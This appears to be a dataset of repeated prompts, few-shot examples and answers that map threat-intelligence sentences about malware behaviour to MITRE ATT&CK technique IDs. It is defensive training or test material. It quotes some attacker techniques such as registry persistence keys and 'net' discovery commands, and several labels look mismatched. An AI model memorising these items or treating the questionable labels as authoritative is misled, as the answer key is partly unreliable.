- Text: Examining the use of the unique user agents’ strings over time shows that while previously only the Mozilla/5.0 user agent was in use, since mid 2017 all three user agent strings have been used by the Zebrocy tool for its C2 communications
- T1033: System Owner/User Discovery
- T1543.001: Create or Modify System Process - Launch Agent
- Text: SpicyOmelette can identify the IP of a compromised system.
- T1016: System Network Configuration Discovery
| BLUELIGHT has collected the computer name and OS version from victim machines. | - T1082: System Information Discovery |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: APT29 has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution.
- T1027.006: Obfuscated Files or Information - HTML Smuggling
- Text: Dark Caracal has obfuscated strings in Bandook by base64 encoding, and then encrypting them.
- T1027: Obfuscated Files or Information
- Text: Javali can use large obfuscated libraries to hinder detection and analysis.
- T1027.001: Obfuscated Files or Information - Binary Padding
| SCT File Analysis The code of the Defender.sct file is an obfuscated JavaScript | - T1064: Scripting
- T1027: Obfuscated Files or Information |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: NETWIRE can capture the victim's screen.
- T1113: Screen Capture
- Text: Taidoor can use "GetLocalTime" and "GetSystemTime" to collect system time.
- T1124: System Time Discovery
- Text: ObliqueRAT can capture images from webcams on compromised hosts.
- T1125: Video Capture
| HotCroissant has the ability to do real time screen viewing on an infected host. | - T1113: Screen Capture |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: MegaCortex has used ".cmd" scripts on the victim's system.
- T1059.003: Command and Scripting Interpreter - Windows Command Shell
- Text: Green Lambert can establish persistence on a compromised host through modifying the `profile`, `login`, and run command (rc) files associated with the `bash`, `csh`, and `tcsh` shells.
- T1546.004: Event Triggered Execution - Unix Shell Configuration Modification
- Text: ThiefQuest uses AppleScript's "osascript -e" command to launch ThiefQuest's persistence via Launch Agent and Launch Daemon.
- T1059.002: Command and Scripting Interpreter - AppleScript
| xCaon has a command to start an interactive shell. | - T1059.003: Command and Scripting Interpreter - Windows Command Shell |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: VERMIN can perform audio capture.
- T1123: Audio Capture
- Text: InvisiMole can remotely activate the victim’s webcam to capture content.
- T1125: Video Capture
- Text: In addition to plainpwd and CredRaptor the toolkit includes a keylogger. The keylogger uses a standard technique to capture keystrokes, specifically the SetWindowsHookEx function
- T1056.001: Input Capture - Keylogging
| NanoCore can capture audio feeds from the system. | - T1123: Audio Capture |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Clambling has the ability to enumerate network shares.
- T1135: Network Share Discovery
- Text: has used ping to identify other machines of interest.
- T1018: Remote System Discovery
- Text: APT32 enumerated administrative users using the commands "net localgroup administrators".
- T1087.001: Account Discovery - Local Account
| The "net view \\remotesystem" and "net share" commands in Net can be used to find shared drives and directories on remote and local systems respectively. | - T1135: Network Share Discovery |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: It eventually downloads a PowerShell module from an Amazon S3 bucket URL hxxps://s3[.]amazonaws[.]com/doclibrarysales/test[.]txt and then executes it
- T1583.006: Acquire Infrastructure - Web Services
- T1102: Web Service
- Text: The HTTP request retrieves contents of the files present in the repository with an interesting validation which checks that the retrieved file is a PNG. The file that was earlier retrieved was named “readme.png”; this PNG file has one of the malicious modules embedded in it. It then executes GetNumberOfMethods and saves the result obtained by the module. This result is committed to the remote repo under the metafiles directory with a filename denoting the time at which the module was executed. This file committed to the repo contains the result of the commands executed by the module on the target system. To commit the file the malware makes a PUT HTTP request to Github
- T1102.002: Web Service - Bidirectional Communication
- Text: No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks. The same exploit was used in the ExPetr
- T1210: Exploitation of Remote Services
| MuddyWater has used web services including OneHub to distribute remote access tools. | - T1102.002: Web Service - Bidirectional Communication |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: QUADAGENT uses VBScripts.
- T1059.005: Command and Scripting Interpreter - Visual Basic
- Text: The malicious Excel spreadsheet was discovered on Wednesday, Aug. 18, 2021, and it has a last modified date of Tuesday, Aug. 17. The filename had an .xlsb file extension. This file has macros designed to infect a vulnerable Windows host with BazarLoader. Figure 2 shows a screenshot of the Excel file.
- T1137.001: Office Application Startup - Office Template Macros
- T1587.001: Develop Capabilities - Malware
- T1588.001: Obtain Capabilities - Malware
- Text: Chaes changed the template target of the settings.xml file embedded in the Word document and populated that field with the downloaded URL of the next payload.
- T1221: Template Injection
| It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks | - T1140: Deobfuscate/Decode Files or Information |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system.
- T1082: System Information Discovery
- Text: The algorithm used by Dyre for generating the AES and IV from the first 48 bytes of data based on a rehashing scheme was commonly referred to as Dyre’s derive_key function, this function was slightly changed in the new bot
- T1573.001: Encrypted Channel - Symmetric Cryptography
- Text: Zeus Panda decrypts strings in the code during the execution process.
- T1140: Deobfuscate/Decode Files or Information
| A sample of the data that is encrypted and sent to the CnC server for version ‘p=2’ is seen in the memory dump shown in Figure 6. At offset 4-7 it contains a time-based counter. It uses the keyword "osamu" in this instance to identify this particular campaign. The campaign keywords are not sent out in version ‘p=1’ but can still be found hardcoded in the DLL payload. The hostname and OS information are also included in the beacon. It awaits further commands from the CnC server in response to the data sent out. | - T1082: System Information Discovery |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: BlackTech has exploited a buffer overflow vulnerability in Microsoft Internet Information Services (IIS) 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control (C2) server.
- T1190: Exploit Public-Facing Application
- Text: APT29 has conducted widespread scanning of target environments to identify vulnerabilities for exploit.
- T1595.002: Active Scanning - Vulnerability Scanning
- Text: has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.
- T1203: Exploitation for Client Execution
| APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices. | - T1190: Exploit Public-Facing Application |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: It imports the specified Active Directory database NTDS.dit and registry file SYSTEM and exports the found password hashes into RecordedTV_pdump.txt and user details in RecordedTV_users.csv
- T1003.003: OS Credential Dumping - NTDS
- Text: AADInternals can dump secrets from the Local Security Authority.
- T1003.004: OS Credential Dumping - LSA Secrets
- Text: Mimikatz performs credential dumping to obtain account and password information useful in gaining access to additional systems and enterprise network resources. It contains functionality to acquire information about credentials in many ways, including from the SAM table.
- T1003.002: OS Credential Dumping - Security Account Manager
| SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information from NTDS.dit. | - T1003.003: OS Credential Dumping - NTDS |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Saint Bot has written its payload into a newly-created `EhStorAuthn.exe` process using `ZwWriteVirtualMemory` and executed it using `NtQueueApcThread` and `ZwAlertResumeThread`.
- T1055.004: Process Injection - Asynchronous Procedure Call
- Text: REvil can inject itself into running processes on a compromised host.
- T1055: Process Injection
- Text: The infection process is rather interesting, as it involves multiple layers of .NET assemblies that will eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another process. In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. The infection process not only downloads and executes a payload, but it also downloads and opens a decoy document to lower the recipient's suspicions of the entire process
- T1055.002: Process Injection - Portable Executable Injection
| IcedID has used "ZwQueueApcThread" to inject itself into remote processes. | - T1055.004: Process Injection - Asynchronous Procedure Call |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes
- T1105: Ingress Tool Transfer
- Text: So this method uses psexec itself to copy the payload over the network, overwrite earlier versions (if found), and run it without waiting for any response
- T1570: Lateral Tool Transfer
- Text: Use of obfuscated shellcode executed via PowerShell to download a "reverse_tcp" payload from Metasploit onto victim systems
- T1059.001: Command and Scripting Interpreter - PowerShell
| MiniDuke can download additional encrypted backdoors onto the victim via GIF files. | - T1105: Ingress Tool Transfer |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Finally, Grandoreiro detects two virtual environments – VMWare via its special I/O port and Virtual PC via the vpcext instruction
- T1497.001: Virtualization/Sandbox Evasion - System Checks
- Text: Once unpacked, the malware creates a copy of its own process with a suspended thread and injects the unpacked code into the new process before calling the ResumeThread API. Breaking on this function call in a debugger allows an analyst to dump the process and extract the unpacked Karagany binary for further analysis
- T1055.003: Process Injection - Thread Execution Hijacking
- Text: can inject a variety of payloads into processes dynamically chosen by the adversary.
- T1055: Process Injection
| When executed, the .NET Framework wrapper will first check if VMware tools is running in background, this is done via a simple process check, searching for any process named “vmtoolsd. Provided there are no matching processes running, the malware continues execution, creating a registry entry with the name ‘MSASCuiLTasks’ in HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce for persistence. Next, it will copy the first stage shellcode in memory and create a new thread with the shellcode running in it, the code responsible for this execution is shown in Figure 1 | - T1497.001: Virtualization/Sandbox Evasion - System Checks |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Javali can use DLL side-loading to load malicious DLLs into legitimate executables.
- T1574.002: Hijack Execution Flow - DLL Side-Loading
- Text: BoomBox can use RunDLL32 for execution.
- T1218.011: System Binary Proxy Execution - Rundll32
- Text: PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.
- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking
| SideCopy has used a malicious loader DLL file to execute the `credwiz.exe` process and side-load the malicious payload `Duser.dll`. | - T1574.002: Hijack Execution Flow - DLL Side-Loading |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: This release adds features to spawn processes with an alternate parent process. This release also gives the operator control over the script templates Cobalt Strike uses in its attacks and workflows. This release of Cobalt Strike pushes back on this technique with the ppid command. For example, if I’m in a user context, I might set explorer.exe as my parent with something plausible (e.g, iexplore.exe) for my temporary processes. If I’m in a SYSTEM context, I might use services.exe as my parent process and ask Beacon to use svchost.exe for its temporary processes. Beacon’s runu command runs an arbitrary command as a child of another parent. These commands offer means to spawn a payload, in another desktop session, without remote process injection. The Resource Kit . Cobalt Strike 3.8’s Resource Kit finally gives you a way to change Cobalt Strike’s built-in script templates. The Resource Kit is a collection of Cobalt Strike’s default script templates and a sample Aggressor Script to bring these into Cobalt Strike. The Resource Kit benefits from new Aggressor Script hooks to provide the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows
- T1078.003: Valid Accounts - Local Accounts
- Text: Wizard Spider has used administrative accounts, including Domain Admin, to move laterally within a victim network.
- T1078.002: Valid Accounts - Domain Accounts
- Text: Cobalt Strike can use "sudo" to run a command.
- T1548.003: Abuse Elevation Control Mechanism - Sudo and Sudo Caching
| Cobalt Strike can use known credentials to run commands and spawn processes as a local user account. | - T1078.003: Valid Accounts - Local Accounts |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: PROMETHIUM has created admin accounts on a compromised host.
- T1078.003: Valid Accounts - Local Accounts
- Text: The script “enu.cmd” created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish, Italian, German, French, and English
- T1562.004: Impair Defenses - Disable or Modify System Firewall
- T1098: Account Manipulation
- Text: APT29 has granted `company administrator` privileges to a newly created service principal.
- T1098.003: Account Manipulation - Additional Cloud Roles
| Stolen Pencil has a tool to add a Windows admin account in order to allow them to ensure continued access via RDP. | - T1078.003: Valid Accounts - Local Accounts |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Cyclops Blink has the ability to create a pipe to enable inter-process communication.
- T1559: Inter-Process Communication
- Text: Turla has compromised internal network systems to act as a proxy to forward traffic to C2.
- T1090.001: Proxy - Internal Proxy
- Text: Shamoon enables the service RemoteRegistry, which allows a program to remotely modify the registry. It also disables remote user account control by enabling the registry key LocalAccountTokenFilterPolicy
- T1112: Modify Registry
| It also creates a pipe for inter-process communication (IPC) by calling the pipe() function for getting two file descriptors for reading and writing data. It also enables non-blocking I/O for the writing file descriptor by using ioctl | - T1559: Inter-Process Communication |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: The plugin begins by collecting the username of the running process, and determining if it is running under the SYSTEM account. If running as SYSTEM, the plugin will associate the active desktop with the plugin’s thread
- T1033: System Owner/User Discovery
- Text: InvisiMole has a command to list account information on the victim’s machine.
- T1087.001: Account Discovery - Local Account
- Text: KEYMARBLE has a command to search for files on the victim’s machine.
- T1083: File and Directory Discovery
| BoomBox can enumerate the username on a compromised host. | - T1033: System Owner/User Discovery |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: DarkWatchman has used Base64 to encode PowerShell commands. DarkWatchman has been delivered as compressed RAR payloads in ZIP files to victims.
- T1027: Obfuscated Files or Information
- Text: IceApple can use a Base64-encoded AES key to decrypt tasking.
- T1140: Deobfuscate/Decode Files or Information
- Text: For instance, the character A would be represented by the two characters 41, which is the hexadecimal representation of that character. The run command (1) creates the process cmd.exe /c with the command parameters appended and will write the output of the command in hexadecimal format to the file %APPDATA%\tmpCa.vbs. The Trojan will then read the hexadecimal formatted contents of this file in 1500 byte blocks, sending each 1500 bytes of data from the file to the C2 server via an HTTP GET request to a URL with the following structure: http://<c2 domain>/resp. hex(Environment.UserName/Environment.MachineName)>AAZ<hex(command prompt output)> The upload command (2) writes data provided by the C2 to a specified file. hex(Environment.UserName/Environment.MachineName)>AAZ<hex("File Uploaded")> The download command (3) reads the contents of a specified file and sends the data to the C2 server. If the file does not exist, the Trojan will send the C2 server a message < File Not Found > by sending the following URL: http://<c2 domain>/resp. hex(Environment.UserName/Environment.MachineName)>AAZ<hex("< File Not Found >")> If the file exists, the Trojan will read the contents of the specified file and compresses the contents using the GZipStream class. The Trojan then gets the hexadecimal values of the compressed data and will replace the following hexadecimal values on each line with ASCII characters to further compressed the data
- T1560.003: Archive Collected Data - Archive via Custom Method
| TeamTNT has encrypted its binaries via AES and encoded files using Base64. | - T1027: Obfuscated Files or Information |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: xCaon has added persistence via the Registry key "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load" which causes the malware to run each time any user logs in.
- T1547: Boot or Logon Autostart Execution
- Text: Seasalt creates a Registry entry to ensure infection after reboot under "HKLM\Software\Microsoft\Windows\currentVersion\Run".
- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder
- Text: ComRAT has encrypted and stored its orchestrator code in the Registry as well as a PowerShell script into the WsqmCons Registry key.
- T1112: Modify Registry
| BoxCaon established persistence by setting the "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load" registry key to point to its executable. | - T1547: Boot or Logon Autostart Execution |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot.
- T1053.005: Scheduled Task/Job - Scheduled Task
- Text: GoldMax has impersonated systems management software to avoid detection.
- T1036.004: Masquerading - Masquerade Task or Service
- Text: Pillowmint can uninstall the malicious service from an infected machine.
- T1070: Indicator Removal
- T1070.009: Indicator Removal - Clear Persistence
| malware has created scheduled tasks to establish persistence. | - T1053.005: Scheduled Task/Job - Scheduled Task |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.
- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification
- Text: BoomBox can establish persistence by writing the Registry value "MicroNativeCacheSvc" to "HKCU\Software\Microsoft\Windows\CurrentVersion\Run".
- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder
- Text: Summary In early May, Unit 42 discovered an attack campaign against at least one defense company in Russia and one unidentified organization in South Korea delivering a variant of Bisonal malware. While not previously publicly documented, the variant has been in the wild since at least 2014. There are three primary differences between it and older Bisonal malware including a different cipher and encryption for C2 communication, and a large rewrite of the code for both network communication and maintaining persistence. To date, we have only collected 14 samples of this variant, indicating it may be sparingly used. The adversary behind these attacks lured the targets into launching the Microsoft Windows executable malware by masquerading it as a PDF file (using a fake PDF icon) and reusing publicly available data for the decoy PDF file’s contents. Attacks using Bisonal have been blogged about in the past. We believe it is likely these tools are being used by one group of attackers. Though Bisonal malware has been in the wild for at least seven years and frequently updated, the actors keep using same high-level playbooks. Common features of attacks involving Bisonal include
- T1059.003: Command and Scripting Interpreter - Windows Command Shell
| While the image is displayed, the code drops an unusual mspaint.lnk shortcut to disk and launches it. The shortcut maintains a multiline target shell script. The 64kb lnk file is downloader code | - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification
- T1059.003: Command and Scripting Interpreter - Windows Command Shell |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: QuasarRAT has a command to edit the Registry on the victim’s machine.
- T1112: Modify Registry
- Text: Rifdoor has created a new registry entry at "HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion\Run\Graphics" with a value of "C:\ProgramData\Initech\Initech.exe /run".
- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder
- Text: surveys a system upon check-in to discover information in the Windows Registry with the reg query command.
- T1012: Query Registry
| Before the driver is loaded, the malware disables crash dump by setting the following registry key | - T1070: Indicator Removal
- T1562.006: Impair Defenses - Indicator Blocking
- T1112: Modify Registry |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: malware IndiaIndia saves information gathered about the victim to a file that is uploaded to one of its 10 C2 servers. Another malware sample also performs exfiltration over the C2 channel.
- T1041: Exfiltration Over C2 Channel
- Text: Alongside evidence of compromise of the organization itself, Symantec also found a copy of one of the company’s own files, relating to its messaging software, on a staging server used by Chafer. The file was in a directory alongside a number of hacking tools used by the attackers
- T1005: Data from Local System
- Text: This data is gathered into an information structure which the RAT zips with an 8 bytes random generated password, which is then XORed with one byte
- T1560: Archive Collected Data
| AppleJeus has exfiltrated collected host information to a C2 server. | - T1041: Exfiltration Over C2 Channel |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: WIRTE has used HTTPS over ports 2083 and 2087 for C2.
- T1571: Non-Standard Port
- Text: APT38 have created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.
- T1562.004: Impair Defenses - Disable or Modify System Firewall
- Text: DustySky has two hard-coded domains for C2 servers; if the first does not respond, it will try the second.
- T1008: Fallback Channels
| variants can use ports 443, 8443, and 8080 for communications. | - T1043: Commonly Used Port |